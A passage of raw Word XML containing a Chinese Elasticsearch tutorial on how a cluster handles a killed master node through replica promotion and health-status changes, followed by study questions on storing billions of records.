    <w:p w:rsidR="004B7C4E" w:rsidRDefault="004B7C4E" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>我们已经说过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>可以应对节点失效，所以让我们继续尝试。如果我们杀掉第一个节点的进程（以下简称杀掉节点），我们的集群看起来就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：杀掉第一个节点后的集群</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="2139950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="图片 3" descr="杀掉一个节点后的集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杀掉一个节点后的集群"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId288" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5207000" cy="2139950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>我们杀掉的节点是一个主节点。一个集群必须要有一个主节点才能使其功能正常，所以集群做的第一件事就是各节点选举了一个新的主节点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>主分片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在我们杀掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>时已经丢失，我们的索引在丢失主分片时不能正常工作。如果此时我们检查集群健康，我们将看到状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：不是所有主节点都可用！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>幸运的是丢失的两个主分片的完整拷贝存在于其他节点上，所以新主节点做的第一件事是把这些在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>上的复制分片升级为主分片，这时集群健康回到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>yellow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>状态。这个提升是瞬间完成的，就好像按了一下开关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>为什么集群健康状态是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>yellow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>？我们有三个主分片，但是我们指定了每个主分片对应两个复制分片，当前却只有一个复制分片被分配，这就是集群状态无法达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的原因，不过不用太担心这个：当我们杀掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，我们的程序依然可以在没有丢失数据的情况下继续运行，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>还有每个分片的拷贝。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>如果我们重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，集群将能够重新分配丢失的复制分片，集群状况与上一节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>number_of_replicas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类似。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Node 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>依旧有旧分片的拷贝，它将会尝试再利用它们，它只会从主分片上复制在故障期间有数据变更的那一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRDefault="008966B3" w:rsidP="008966B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="256" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现在你应该对分片如何使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>可以水平扩展并保证数据安全有了一个清晰的认识。接下来我们将会讨论分片生命周期的更多细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008966B3" w:rsidRPr="008966B3" w:rsidRDefault="008966B3" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B7C4E" w:rsidRPr="00F41A4C" w:rsidRDefault="004B7C4E" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00036169" w:rsidRDefault="00B63790" w:rsidP="00B63790">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如何存储十亿、百亿数据？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63790" w:rsidRPr="00F41A4C" w:rsidRDefault="00B63790" w:rsidP="00036169">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>答：使用数据存储集群，增加水平拓展能力，以容纳上百亿数据量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036169" w:rsidRDefault="00B63790" w:rsidP="00B63790">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如何保证在十亿、百亿数据上面的查询效率？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
